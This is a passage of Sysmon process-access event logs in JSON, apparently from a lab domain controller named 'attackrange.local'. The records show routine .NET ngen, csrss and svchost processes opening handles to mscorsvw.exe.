{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7041,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.418\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-0010888E0E00}\r\nTargetProcessId: 1656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.418","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-0010888E0E00}","TargetProcessId":"1656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7042,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.418\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-0010888E0E00}\r\nTargetProcessId: 1656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.418","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-0010888E0E00}","TargetProcessId":"1656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7043,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.418\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-0010888E0E00}\r\nTargetProcessId: 1656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.418","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-0010888E0E00}","TargetProcessId":"1656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7044,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.465\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-001029920E00}\r\nTargetProcessId: 2476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.465","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-001029920E00}","TargetProcessId":"2476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7045,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.465\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-001029920E00}\r\nTargetProcessId: 2476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.465","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-001029920E00}","TargetProcessId":"2476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7046,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.465\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-001029920E00}\r\nTargetProcessId: 2476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.465","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-001029920E00}","TargetProcessId":"2476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7047,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.511\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-00101FB40C00}\r\nTargetProcessId: 656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.511","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-00101FB40C00}","TargetProcessId":"656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7048,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.511\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-00101FB40C00}\r\nTargetProcessId: 656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed 